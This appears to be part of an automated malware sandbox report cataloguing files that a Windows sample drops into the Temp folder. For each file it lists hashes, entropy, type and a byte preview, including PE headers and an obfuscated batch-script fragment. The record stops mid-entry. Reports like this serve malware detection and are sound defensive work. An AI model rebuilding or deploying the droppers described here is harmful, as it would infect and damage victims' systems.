                                                                                                                                  MD5:EBDE83ED138C71C69900E4BD1457B350
                                                                                                                                  SHA1:72F1A2451212ED1F903509AE5269C29F6C8A0470
                                                                                                                                  SHA-256:5F79CB429F8BBD9B6CEB7DDB16AB50EA1E1160950B3C3A08E509C5349ABFC696
                                                                                                                                  SHA-512:EEF84FF8101827E3F172A7C24EB6B4610DDFAC88A76C4E58AFA054AD8AC8EBF9DD6B368A97D9299EC9A33F0959EF56C7E4F57CC51B4BB97A4B8E139911D87E2C
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5...f...f...f..qf...f..`f...f..vf...f...f...f...f...f...f...f..af...f..df...fRich...f........................PE..L....q?d..................................... ....@...........................&......x.......................................6..(.... ...................................................... 4....................... ...............................text............................... ..`.rdata....... ... ..................@..@.data...|....@......................@....biwapeh.............B..............@....tls.................F..............@....mim.................L..............@....rsrc........ .......P..............@..@........................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\1248.tmp.exe

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\464151\Blank.pif
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):343552
                                                                                                                                  Entropy (8bit):6.978950038889956
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:6144:dPcOAW6KJ/Ah9RjKNUX973f8s3tQsTVBZ7kwxH:dTnhijKNmrfPkwx
                                                                                                                                  MD5:EBDE83ED138C71C69900E4BD1457B350
                                                                                                                                  SHA1:72F1A2451212ED1F903509AE5269C29F6C8A0470
                                                                                                                                  SHA-256:5F79CB429F8BBD9B6CEB7DDB16AB50EA1E1160950B3C3A08E509C5349ABFC696
                                                                                                                                  SHA-512:EEF84FF8101827E3F172A7C24EB6B4610DDFAC88A76C4E58AFA054AD8AC8EBF9DD6B368A97D9299EC9A33F0959EF56C7E4F57CC51B4BB97A4B8E139911D87E2C
                                                                                                                                  Malicious:true
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5...f...f...f..qf...f..`f...f..vf...f...f...f...f...f...f...f..af...f..df...fRich...f........................PE..L....q?d..................................... ....@...........................&......x.......................................6..(.... ...................................................... 4....................... ...............................text............................... ..`.rdata....... ... ..................@..@.data...|....@......................@....biwapeh.............B..............@....tls.................F..............@....mim.................L..............@....rsrc........ .......P..............@..@........................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\464151\Blank.pif

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                  Category:modified
                                                                                                                                  Size (bytes):893608
                                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                                  Malicious:true
                                                                                                                                  Antivirus:
                                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\464151\V

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):651594
                                                                                                                                  Entropy (8bit):7.999704883687562
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:12288:KYqIsUkqMof9jNgeV//i+wAW8M1e5425cwCYeJGtqaMSrGqC:6InkTSHHV/q+wn8M1e540cwN4GtnzrGd
                                                                                                                                  MD5:838EFE8B316B87F7565D8B9140DB5B97
                                                                                                                                  SHA1:9A3868F789D2DC639B62BBB734A8A94E69E6BF3E
                                                                                                                                  SHA-256:D7BCF7152E790281B8D8AEE5D20C2B106F41BB1FF2275F777429781E8FF4B7AA
                                                                                                                                  SHA-512:757630AE8A942DAF6F214C4B233BB8CBE586B5F400668DCCF6593C651228787B1B391E141C3F7E9F18587A232313A28A6D3A928F0319B6CE6BACA6150D429C05
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:........Y.^.'..]ht.L.....~....6n..I...R.xy.?!....>...9W4.$.i...(<.^s3.V.h~#9/Yvo..Q....[......^.z..M...w.........13~......h......W..v.u....E..@'....S....~..`.4M..f"........(.u.l...6....*...^:\.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Ma......m@nD<....d....s..........x.C\X...........J...+....^.w.5............?r.Q..m;.....w.....;.&.......2..g2"~?]...*k4...p...G.....................D`......D`kC.R......%x....}...q..U-...(....%....V..?p.he....,.. .o.UA..1.An....H.`>$O.ng.)........s+V.p...'|.G...!.$..n.K...;E..<J.W.C3.lY....A8>..>..1...32...T8}..,...E...../S..i=.#\In>3(..?..*i...v..x.......s.8`......D`m........8.5...x..2(.U.j...."a.x#.A.....)..hO....F=.x.E..pX....@..N-..|{y.......W=Y...`M.F|....g........... l.n.......2......o.v4.p.m.f.D..f..7.f.Z.?..z.pI7...}.0..O.;....c*..n{..o...=Z...J..n.,.fC.B.r(I..Z.w..c0Z.9,-...~|...cO{.6.. x...P...k...GH...mV~.o........}!....Z|...zi.#...1..p.@.....r).B..q6

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Accepting

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:ASCII text, with very long lines (971), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):24131
                                                                                                                                  Entropy (8bit):5.111863914131144
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:1Dm/6+XL76DcwPOzNFjiF6w4uOjCuq9ZLLby3cOuQOA4U6qeeZVDvy8QSF7:lm/6KvahOjOF6wjI14nQneejDvyE
                                                                                                                                  MD5:F14E5B68165C920E393B41976A8AC08A
                                                                                                                                  SHA1:FB452D68D210B2F2A44486EEAEEFBA22DB3C92F1
                                                                                                                                  SHA-256:CD1B9C8FD3277BAFEE94853A181D8384D3D8D3317296FA57ED66F245C41AFA25
                                                                                                                                  SHA-512:E16D30F83C3D47520F6FB9B46072F047FFDBD56D94248457F50B4B952F1E0CC4CDD9DD98CE4E043340096D1C4A97E3F5A63DBECCDA9B6B8076DB2D45CA8B3450
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:Set Syria=e..AuDoJunction-Brokers-Accepts-Tone-Soc-Mostly-Effect-..DxXxCurrently-Barrier-Serving-Pen-Temp-Worry-Adopt-..HTJoy-Keeps-Formatting-..BHPCalculators-Mall-South-Rear-Calendar-Gratis-Conditions-Regions-Anniversary-..XkAttraction-Stick-Facility-Soc-..SjCastle-Historic-Std-Derived-Refers-Honolulu-..kWzNovel-Wed-Digit-Cs-Graduate-Flame-Pockets-Digital-Prizes-..YlPgp-Subscribe-Hi-Palace-Allowed-Ll-Graduates-..DxZuJosh-Granny-Washer-Story-Links-Biz-Presentations-Aluminum-Nodes-..QGWInvesting-Nationwide-Man-Explicitly-Claim-..Set Rainbow=n..CLScreen-Ambient-Cuts-Jelsoft-Follow-..xSBreaks-Prayers-Quite-Lawyers-Question-Damages-Claimed-..cDGlad-Adipex-..yMgFri-Anywhere-Xml-..ZzDebian-Switch-..KHrJoy-Inn-..Set Houses=m..fATRRoger-Discipline-..IsAaOld-Blake-Tours-Approval-Hormone-Inexpensive-..slVDSay-S-Stripes-Circumstances-Calls-..KXKVSurvival-Experiencing-Rep-Folders-Refund-Routine-Carmen-Conjunction-..WARFoo-Idaho-Advance-..MnNovember-..aaHandling-Media-Loved-Morgan-Singles-Hardly-U

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Accepting.bat (copy)

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  File Type:ASCII text, with very long lines (971), with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):24131
                                                                                                                                  Entropy (8bit):5.111863914131144
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:384:1Dm/6+XL76DcwPOzNFjiF6w4uOjCuq9ZLLby3cOuQOA4U6qeeZVDvy8QSF7:lm/6KvahOjOF6wjI14nQneejDvyE
                                                                                                                                  MD5:F14E5B68165C920E393B41976A8AC08A
                                                                                                                                  SHA1:FB452D68D210B2F2A44486EEAEEFBA22DB3C92F1
                                                                                                                                  SHA-256:CD1B9C8FD3277BAFEE94853A181D8384D3D8D3317296FA57ED66F245C41AFA25
                                                                                                                                  SHA-512:E16D30F83C3D47520F6FB9B46072F047FFDBD56D94248457F50B4B952F1E0CC4CDD9DD98CE4E043340096D1C4A97E3F5A63DBECCDA9B6B8076DB2D45CA8B3450
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:Set Syria=e..AuDoJunction-Brokers-Accepts-Tone-Soc-Mostly-Effect-..DxXxCurrently-Barrier-Serving-Pen-Temp-Worry-Adopt-..HTJoy-Keeps-Formatting-..BHPCalculators-Mall-South-Rear-Calendar-Gratis-Conditions-Regions-Anniversary-..XkAttraction-Stick-Facility-Soc-..SjCastle-Historic-Std-Derived-Refers-Honolulu-..kWzNovel-Wed-Digit-Cs-Graduate-Flame-Pockets-Digital-Prizes-..YlPgp-Subscribe-Hi-Palace-Allowed-Ll-Graduates-..DxZuJosh-Granny-Washer-Story-Links-Biz-Presentations-Aluminum-Nodes-..QGWInvesting-Nationwide-Man-Explicitly-Claim-..Set Rainbow=n..CLScreen-Ambient-Cuts-Jelsoft-Follow-..xSBreaks-Prayers-Quite-Lawyers-Question-Damages-Claimed-..cDGlad-Adipex-..yMgFri-Anywhere-Xml-..ZzDebian-Switch-..KHrJoy-Inn-..Set Houses=m..fATRRoger-Discipline-..IsAaOld-Blake-Tours-Approval-Hormone-Inexpensive-..slVDSay-S-Stripes-Circumstances-Calls-..KXKVSurvival-Experiencing-Rep-Folders-Refund-Routine-Carmen-Conjunction-..WARFoo-Idaho-Advance-..MnNovember-..aaHandling-Media-Loved-Morgan-Singles-Hardly-U

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Estimate

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):88064
                                                                                                                                  Entropy (8bit):7.997843396353263
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:SGYPhYcX/Cugmu+yddwZ7T8Nt21s///EkwilWJHrx8E5:VYpYS/CNzCxTw4GYWWJHN8E5
                                                                                                                                  MD5:12C01DD442246C86B9705C22878A5B9C
                                                                                                                                  SHA1:537667C2597F451BF8FE3F8F2F469F2737C5256D
                                                                                                                                  SHA-256:AA8C7503C4DF2957644E1B101DDA4B6D9A62D949ADFD4CC3B3362142CC65D646
                                                                                                                                  SHA-512:4D79BDA66011DD6C19B0B947D11D325A09BE30021A8E67BFB48AF0354ECFC3652741707C513163A0732E9F36E1E57E0886E5123101018BA2F355F110175DDFCF
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.A......=. b.8.w..[O..aT...i...M..h|.t{.%.._S.......;c...@....... ......J#.a3...d.-.).>.....< r.T+i.@..e(.[.n...z.........}.:.q...|N....xXl.....x...iE....._.~..b.G....)..+.kW`u.{.>Q.A.:mG.....y....n..5.g..{F....?........'%...)..C.I.gG..|,...4.u.wF#}.. "2......T...F.2...P..$/.au.jNs.......-X.H.j..7.5.....)..6...N.......D..VGG./V2C#./...[.<*F..}.....;o....._.......A.}1...Z.|...e...O..IM.T.04...EoE.8.!..4o..g.A...,...N{..V_...... .6h....fE.}.*.N......%..g..j..nNJ\H.M.,...{.....#...,`u.T....R..Xc...........J.... .e`.>..{%..+.|..n[...s.jO...M..I...t.._/..Q....0.n....5l{c...xc.@O.........e......8&.&..D.y...PX.8.d`.j...Ud........J..\.|.JW.s...'.....N2$"..$...M..?_G.#.,ns.M.....x.....R.=M..........^K.......X....}..<^i.dI[..x......LA@3#...6[.M.`...>g.L".........x1\...h.....p...A....@.QN.u.....L..n..$.d.T_..../z.....3b...G-.'.S.|*........j.E.n>.b..iq......=..:2.^..Q....n.|...e......lj.YY.l.j.}.[.:S..W.....s....&4...d3.......B.o.A<.+4&

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Fires

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):886451
                                                                                                                                  Entropy (8bit):6.622120687046833
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:12288:cV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:mxz1JMyyzlohMf1tN70aw8501
                                                                                                                                  MD5:AE28BA086C0C455E753ACEFC06402B89
                                                                                                                                  SHA1:1E60187175A22EF2ACA0692CBC892E283A803841
                                                                                                                                  SHA-256:E4DF40E7718E52BBC84E37BCD6FE45B2ED4300C3B2A76BE526E189906DB8682F
                                                                                                                                  SHA-512:FF6F395FD8C3252280249CC6D91A0DCC26083DA8B81CEEC98475A6F8D581B9B5F8AF3221BA294A8951EE2CDC72EC8D70B9E53258F016168097A04E14D8774195
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:......t<.u..@....M.....B`....8.t".....|.;........Bt....8.t..._^]...2...U..V..W.}.;............Ft.......t.Q.?....Ft.... .......;.....u?...|..Ft......8.u.O......}..........Nx.Nx.Ft.4......FtY.Nx.$...~x.v..Nx.Ft.D...8.t._^]..................j...U..Q..(xL.VW9.0xL.un.=4xL...........h.........Y..................E..}.P. xL......54xL.F.54xL...$xL.....0xL.....9.M..I..O._^..]...j.^3.;.~...$xL....98u#h.....[...Y..t..............3..F;.|...U..V.u.W....t$j.V..\.I.;Gxs..Ot.......t.91u._^]........U..V.u.W....t$j.V..\.I.;Gds..O`.......t.91u._^]........U..QS3....wL.....V3....wL.@...wL.W.....wL...wL...wL....wL...wL....wL....wL..=.wL....wL....wL....wL....wL.....j.^j|Xf..wL.3....xL.h.I....xL....xL....xL..=.xL... xL.l.I...$xL...(xL...,xL..50xL...4xL.......8xL...<xL...@xL..=DxL..=HxL...|xL....xL....xL..=.xL.f..wL..2.......~....]..E.. xL.P....Nu._^..wL.[..].V......|xL.....c....%.xL....8xL.....b....%@xL... xL........xL........wL........wL.....D...^.U...(SVWh.....*...Y....A......^........xL..}..M.9..

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Heat

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):7189
                                                                                                                                  Entropy (8bit):6.204171756579553
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:gHAeOqAFDw09CV/2nPvj6DdMP3r1HI5jMlbNz:gHAHhww+/2nlP3r1WAR
                                                                                                                                  MD5:73D5C7D3EBBB947D91FF896FF5B2F843
                                                                                                                                  SHA1:3302E831F49C19E7FBC74EDF062FF65BB2F7BE9A
                                                                                                                                  SHA-256:BEC68486D99078B54522069645C3EC631BAB79A7A3F22CE6FA2E5CE23836F6D9
                                                                                                                                  SHA-512:349509717CA66E899820016893213D2580E37C323AD17C6E7E451ACF782A491A9A690D04C7B531946D3473B5C368AD1464B412D6103215520F9ED624EE41D409
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:DHappenedWestminsterUnexpected..MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Keeping

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):80896
                                                                                                                                  Entropy (8bit):7.997819336514691
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:iEdxxV8BkeN0Asq+CNiupP8qYM/93jh7UtoZA8NGpafJTNdm5wDzs3:iEd5gkeN0AsjupPRYM/93jhomZfNGpeI
                                                                                                                                  MD5:C35DF8E3C5CA784728139FBA60AD5534
                                                                                                                                  SHA1:9C54F856C62778D22336BAE9DEDB5AFE14580B64
                                                                                                                                  SHA-256:92F3724BEF58D68265AED3269059190577F317DC6B755618F180EB487A942472
                                                                                                                                  SHA-512:78F3DC83BDDA1D5EB975256DDB442658478A7C13F4F81789FB1D860A8E9CAE2D0E1E8A153F2FD9556F5C77907667EE12EEBF4F44B2E0ECC46C5175260E947700
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:N..G.E".....NM2.B}$.>X......#.b8w.<.qND.xj=. ...*~..#....G...1....<~....k.$.zzg~..Y.h.P.&...q^.3h.....>.m9z.=.-......l..w.......G.p.rl.D%..]....k.9..R..p:...D,&tK@rA:J.&5.m|.c.Z.Q~...f..G3[hG.B.[.{w/&h.!.Vm..]U.(.h....j.6..#>..(V.S~0F....,....sp.....!D..(...9$..B..|m......R.b.=..w..3>$0..B.%..g..:U.r.~QM....nS-7.1...R.q]....S1...`p.........o...Yk.<.....V...*....`...(.CB.D.:.*.Uk..o..7O...H.F....d../B....i-....+.`.D(C._...S.L...9........i&.;..w..Kd"h...%.._K....=/o|...H.q......K.-H-..MEQ.L.&/...2......&@I........U....[0....f....|..8.f....*;.....g(.8[2.t.........V._G.J.@e..4../.Ql_vR%..O...-O.p..X.0..'..5.:Pc..}......)..X.'..I..\.jg.}..%@..q.bEa.G.t%.2..G_oq....%q*!....LJ...b..Y.j...1.J......AT.....\pX....n.....$J...n..r..m....K.E.+I6=BAM....#...%.~...?...IC<...u(.F....w..{.]..Rkv<b.k..}'..4..".~y..l...a..-..x[~`.-..8..>.m.9.*......TX..#..A..;JL....w.@h......6).w.4WT}....[..4....p...V.M..,...[..|[....k..[...3UfljF...Jf.V.;b..7...x..XB..E.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Kingdom

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):59392
                                                                                                                                  Entropy (8bit):7.997078021060302
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:5xL7iM0UrGZdesJbY/NlZsMDuiilQvoo01Pj:vLGM3GZdeXlsiuiiI017
                                                                                                                                  MD5:EC2FAF161215F2E47FD83575EE9CBD6A
                                                                                                                                  SHA1:01B77C4F4612C41B1E41AB52B842D0CCCF88EB7C
                                                                                                                                  SHA-256:86A16FD759EE8DC30AB8B6ACE2DC052CE2BC1AC155645FA39980EC8C9AD501BA
                                                                                                                                  SHA-512:5BCC84E4CAA0044EE911A64A1FB53B110EFA8C346C3FFB9C3F9C1576889EA0E41B707833E3661EFB0471287CED0D0CB83466490C31C9E2F4B4D6BEA02B92DB00
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:.w.$&n.?.dA.N.....Mo....[Y.=../.k.7^.......0\...7-....{,..Q5D.....sK.A.A.~......@..4..D.....+........RC.yO..|...)D.j.*.T...W.x....L....e..a%....F...}........uF.J..Z.O..Y4../.v..i}.G.o.4..y=.K..sM...-...?..3Q......&...i.ao.x..........+...@.,>..S.vcW:GS._#.q..m....#...#...X.y...[.^.....E.y..Z..z5<..M.2t....^....8~;..+.l.7....&...+.@...S.3Jf.1..^...~.i...6..9.i.....J..,.}.6..f..U...TU..a.e...P.......8.,.0...N..?.`..)<^.....T...C..d.5..{..u.....gr..A_c.l)J1.......I.^.R..:.....(..#......~..I>.B-..B.!b9SV..TJz.]....V~H(...Z ..t.\....\S.H..e......?!.-w..._.T4(.V...%k..A...K.....9....N.....)......E).NWv.4...\(..%"@.>..R...`.m......6..v.#.....X..a.`..&g.;...]Y,7..F....T.:.&m#.".}........W..5..,.N.g.<f,..8W..Y.J.9.!x........@.X.....D].7..!...;...+.K..^u.{.M}.t.#..`......>.....w..E...=..A..R g.......i.:n....p...).s.kr#.a.}1.*.#P.b.C..i.~....).D..K.DUi>.W..U.Cv]....{..4..1.$.*.@....k..........o~..6,4...Rj."..xA.....T.(f....b.bt.>#b..U...|....?.

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Nails

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):69632
                                                                                                                                  Entropy (8bit):7.9969615485880405
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:5YzF77ZmnJF3FYelbA93IoNicfIl0X9H83B8R25TiVEYS+jkuSWod5R:s7ZW33uMXl0IYS+jkuSLdn
                                                                                                                                  MD5:90CD2778C86D2AC4EF8F344591D8C4E7
                                                                                                                                  SHA1:52BDE62938B2F33DFE9E1B99CBFDA695EDD8F19C
                                                                                                                                  SHA-256:25DCDABC8027C0AAFC5D35D300453031D3B9146C627991E2AF7FAD81F64C7371
                                                                                                                                  SHA-512:ACC04AB8A863CF439323868787A1C8FF46B89D68795E508D6DAABA586BA37F171283CDDA188C24AE2AE254F36C9060D10221EB2016BD72F231564C9556824CF2
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:....K.|...Iq.........i...I....k.?*..S.'B..c.....w..0b.O..M.d;;Z(.@......@../.M...-L-N..y)....=9[......=...E..{].i.F..%...xy.......v..........(.-B.....vf...}...h...`...I.i(.;... 5.....j..Lv......0.r.L.@...W.s._.E<..h.*z.....P...F......7..0.:..%.....L.mz..mb...b.k.y.s;..A.~.k*...:z...{....n2.c.2..or....H:j...xl.....GF.}...N1'..P%.G.Q.%.b....7.Q.<;.. .N=7..%..2....m.........WW...?..h.......#.p.........r.Xy....`e".g...,...Y...V.[2.t.S..lDxr...,.g...i...T.S.vYN........OWc._-..|O.....<1.G).8........_..k.M.........Okp{..k.[.(5OHG. ..'_..+p..X:..#.]n.YJ...b..K..`a........./&lY..O.....tj.$.5....... .=.:.UA...fE...b.._<U..?nX...Bb......;.5...a.+&.|%xV[y..a...._@......F.2.D[#tY....[......4.b..!7.....2p....U#_.{o.Y.W..U.....X...b@g....?S..c|x..cD....C[.t....c..&.._...{i@.9u..p..#*.m..k...x...!..3GH.....x'R..w.V.h...k.S%...!9...V.Xq.....P..#...o.b.......2..y...o.....X.-.F...=a..O:.}.L_..E.i s+...S._.B..!-.,.We.U..........*.P.).Rg...v..E..+...8Z.B!

                                                                                                                                  C:\Users\user\AppData\Local\Temp\New

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):81920
                                                                                                                                  Entropy (8bit):7.997960195414088
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:PSvFbUf6xFBjISi9jUS31wc7c9+jt3e/F7GgivqaGIEBRx:6vWfWBgjUSB7cswRuqaGjD
                                                                                                                                  MD5:481A5A1A7DB0BB89198B22F7CBB7994D
                                                                                                                                  SHA1:62B724D306EA7C9E7D73074ED3DE766F62D6D9B5
                                                                                                                                  SHA-256:DCBBFF46F677A5C4FEB9CED80F4FD41A64FCD70ADAC49AE02C52CE455988B2E7
                                                                                                                                  SHA-512:D7C3AB27F86C782A470310961A2AE43680A6306BA575DAA5E39648AF0B72F77FF07AF1D8FF596AEB919C095F1EF4D2B5B67CE96C27E9CA464E140E8464D9365A
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:)....-....i..}.r.%.sE..dCX..2..j..s=.xxP..5KS.I.W...$L%.a.5.9|64-...F...........M.@.!.....]W......{.....>?..6j.F....v.x.wH./r..M#FMs.1. $.......B`..FF.h|..2.......<i.|T~/....L..b...?....0@..J..K].;..E.Rw.8%c6.....HK...+..CZ....U....;I..l-...@.|..6.C|.*...q3...o..G.w.u..eN{(.../...RC..c(..4..v..F..8C..h..!....8.b....lC..X.{k...#.....(?.$ ..........n.e.V...k....-..0..IO.D{:./q./...._%t:8...G.of...V.O.~.A#.^.W.......9Y.....D..Q.f.?9\..H....G...M.. 4zvI.O...a.z..vd{..?-.w3|b:gvw?g.....E.YD.U.?.\3.$8.Y.^0.O...b..Nw...K.4.."...uG.".1.p.....P...~..G.ZdyK...t.......'...v...l...+*....e3.R.`...........g8..sI..y.........;..N'.F.I<^J&.Q?.@.e.-.ZO.8N.......['\.+.9c.`[..KE..F.e.....B.`]4..Q/f....`..'FTr.:.........u6..;.UI..m.(..&.....,....k.. .*4.t.9.8..'.8PGO.Bd.k...=....4...0.."..9b. .T...Z..m...l.Hf..`K...g...7.F..\...../.Y._.|.D....N..b...I6r.+...I.....#..6.cg?_#._=/.Tu..k.'MO...0DqO.59..T3.nhBj.sMm./.......`J9,S.....x?<.`..Y........?t.+..~f@.i.(.L..-

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Tears

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:data
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):74752
                                                                                                                                  Entropy (8bit):7.997679544342888
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:YeTj8GcV9KKovQyord6pl3ChTZVwzmYqf3i:Yej85D0cB6QZmQfy
                                                                                                                                  MD5:74A9C9F8C474E443C382A65F11C5BEC2
                                                                                                                                  SHA1:8B9EDE6207527915F40BC47E6CD813A543C9C1E8
                                                                                                                                  SHA-256:6D6F037EC535F3DCB54478E814D53BF2A8D35AB2245955739EF0C89657E1BBD4
                                                                                                                                  SHA-512:28C62B8D23F5A724FE53CA58B784C63780B571BC8DA4C301B1547E36EB9338A7CE0A6065578ECBB695941FC543AECAAD142F4703B3F3F7F120373D6B2DA119A0
                                                                                                                                  Malicious:false
                                                                                                                                  Preview:....w...\:.S..1..;{u....0..I.2...b.J.i...'..}...x..:..fW4O..2k....U...qw.u...>+...ex0Z2.N.>}.;.d81.\'A....Ud..xL..zq...i.Q.2........P....A_B..s.x'EWZ!x..1&..~..*.8...E)&.{Z*.d.1vq.l.........i;.{..2p.J........7_5.~.d.x.G..7.@..C.....L"...,...s2}...'_.@....4.~rxjD5G.V`..].V..../.....RV+.K.2z..F#T..5..sS....cW4.D....(....p.....k..T...A@.....X}................#:.....i........n.C.Z...v.8.P...,2......o.%..(p.}..`2.t.h.....G6.[..)...*....2..........?..{.#..p...T.<....>.r.U...gK.r.K.....RZf:Rx.y]..lm......q.'.4e.9..+_.........OT\.u..J..N.D..w..~o..a.hf.....f..=......l.2.{...|.y..8.o(..&......(k..Rx2.-..0nuO.R..p3M........T....?.ZC7"..M..q./9......M.9)..!....].Z+4W..<a.5...p".Y.1_:.1N.;.....^....Y..Z4*.\u.E...&.x..?..!5......E.7x...-E....jZ.$f.9.rS..gI....gZ....._..: .Y.>..... ..[..,..J...J..+..S&...k.%..d..Z...)!...0J=....T...\+.#.w._...*..#...#......k).xp~...r............j. ..|P.T5.h.%...%Fys..x.]Iuj./arttS......r-.- @..Y...R.%..

                                                                                                                                  C:\Users\user\AppData\Local\Temp\Theaters

                                                                                                                                  Download File
                                                                                                                                  Process:C:\Users\user\Desktop\hlyG1m5UmO.exe
                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):93184
                                                                                                                                  Entropy (8bit):7.997900634785597
                                                                                                                                  Encrypted:true
                                                                                                                                  SSDEEP:1536:LVCnNrJCK/0ea4k6QpfVkwQ2VfVZnm6mc8qG257A5GTVNm6XMEVAhZYUtrplzTQq:xCzCvF4+VkspVFm6rICsgTBX3AhZ7nIq
                                                                                                                                  MD5:926C3FDBB5B076DBEC7F62E0EDD0B22B
                                                                                                                                  SHA1:42228AF3329D02DD7B715BA4F7F39F0E440B97C7
